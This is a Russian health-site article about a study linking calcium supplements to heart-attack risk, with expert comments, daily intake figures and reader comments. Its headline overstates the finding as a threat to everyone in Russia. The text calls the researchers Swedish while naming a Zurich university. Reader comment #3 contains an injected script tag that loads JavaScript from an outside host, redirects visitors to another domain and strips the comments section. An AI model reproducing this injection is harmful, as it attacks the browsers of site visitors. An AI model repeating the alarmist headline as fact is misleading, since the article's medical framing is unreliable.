Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Добавки с кальцием повыша...  >>  Добавки с кальцием повышают риск развития инфаркта на 86%. Все в России, кто принимает добавки с кальцием, вам грозит инфаркт!
 
Обратная связь
 

Добавки с кальцием повышают риск развития инфаркта на 86%. Все в России, кто принимает добавки с кальцием, вам грозит инфаркт!

Размер шрифта
14 июня 2012 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Шведские ученые предупреждают, что добавки с кальцием необходимо принимать с большой осторожностью, поскольку они повышают риск развития инфаркта миокарда.

История вопроса

В предыдущих исследованиях, направленных на изучение влияния кальция на работу сердца, получены неоднозначные результаты. Согласно данным одних исследований, добавки с кальцием препятствуют повышению артериального давления, снижают риск развития ожирения, сахарного диабета 2 типа, инсульта и сердечно-сосудистых заболеваний. Результаты других изысканий свидетельствуют об отсутствии подобных эффектов.

В двух последних исследованиях, опубликованных в 2010 и 2011 годах, доказано, что добавки с кальцием увеличивают риск развития инфаркта миокарда.

Новые данные

В течение 11 лет под наблюдением ученых из Университета Цюриха (University of Zurich) находилось 24 тысячи мужчин и женщин. В ходе исследования участники заполняли специальные анкеты, в которых отмечали прием витаминов и минералов. На момент начала исследования всем участникам было около 50 лет. За время наблюдения ученые зарегистрировали 260 случаев инсульта и 267 случаев смерти от сердечно-сосудистых заболеваний.

Следует отметить, что употребление продуктов, богатых кальцием (молоко и другие молочные продукты), приводило к снижению риска инфаркта миокарда на 31%. Однако употребление добавок с кальцием, наоборот, сопровождалось значительным увеличением риска – на 86%. Тем не менее, за время наблюдения инфаркт миокарда развился только у 354 участников исследования.

Почему кальций, который содержится в продуктах, и кальций, который содержится в препаратах, ведут себя по-разному, точно неизвестно. Существует предположение, что кальций высвобождается из препаратов не постепенно, а одномоментно. Резкий подъем уровня кальция в крови ведет к его накоплению в атеросклеротических бляшках, что увеличивает риск развития инфаркта миокарда. Результаты исследования опубликованы в журнале «Сердце» (Heart).

Мнение экспертов

– Вместо того чтобы принимать таблетки, необходимо увеличить потребление продуктов, богатых кальцием, – считает профессор Ян Рейд (Ian Reid) из Университета Окленда (University of Auckland). – Кальций, который содержится в таблетках, ведет себя в организме иначе, чем кальций, которые содержится в продуктах питания. Женщины, бесконтрольно принимающие препараты кальция, должны отказаться от этого.

– В каждом случае вопрос о назначении препаратов кальция должен решаться индивидуально, – рассказывает Сюзанна Стейнбаум (Suzanne Steinbaum) из больницы Ленокс-Хилл (Lenox Hill Hospital) в Нью-Йорке. – На сегодняшний день известно, что для укрепления костей при остеопорозе можно использовать специальную диету и физические упражнения, а не только препараты кальция.

Суточная доза кальция

  • Для женщин в возрасте от 19 до 50 лет и мужчин в возрасте от 19 до 70 лет суточная доза кальция составляет 1 000 мг.
  • Для женщин старше 51 года и мужчин старше 70 лет – 1 200 мг.

В стакане молока содержится 300 мг кальция.

 

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - helena

03 июля 2012 в 15:10

Цитировать   |   Пожаловаться

"Почему кальций, который содержится в продуктах, и кальций, которыйсодержится в препаратах, ведут себя по-разному, точно неизвестно."
Ну как же неизвестно? Очень даже известно: дело обстоит так же, как и с железом. Хорошо работает только тот металл, что входит в состав белкового вещества. Очевидная же взаимосвязь!

helena 03 июля 2012 в 15:10
Ну как же неизвестно? Очень даже известно: дело обстоит так же, как и с железом.
 Как удачно, что Вам все известно, можем швейцарским ученым фору дать. Однако, не так все однозначно - и с всасыванием железа, и уж тем более - с усвоением кальция. Это - разные процессы и аналогии здесь нет. 

3 - zzzzzz

30 июня 2015 в 23:40

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Новое о чае. Дополнительные аргументы в пользу чаепития   Что с вами делает злость?   Как пережить жару дома   5 цифр про вашего мужа и сына, которые вы должны знать  
22 июня 2013Грецкие орехи спасут от инфаркта 20 июня 2013Собака спасет от инфаркта! Какую породу завести, чтобы не умереть
 
18 июня 2013Повезло, живете в пешей доступности от шоссе? Не так быстро! Чем ближе к шоссе, тем больнее почки! Как защитить себя? 04 июня 2013У вас лысый муж? Он может умереть от инфаркта
 

Слайдшоу

1
Есть ли секс после инфаркта?
Смертельные опасности для родителей зимой
Что делать, если муж храпит?

Тесты

Будет ли у вас инфаркт?
Грозит ли вам инфаркт миокарда?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.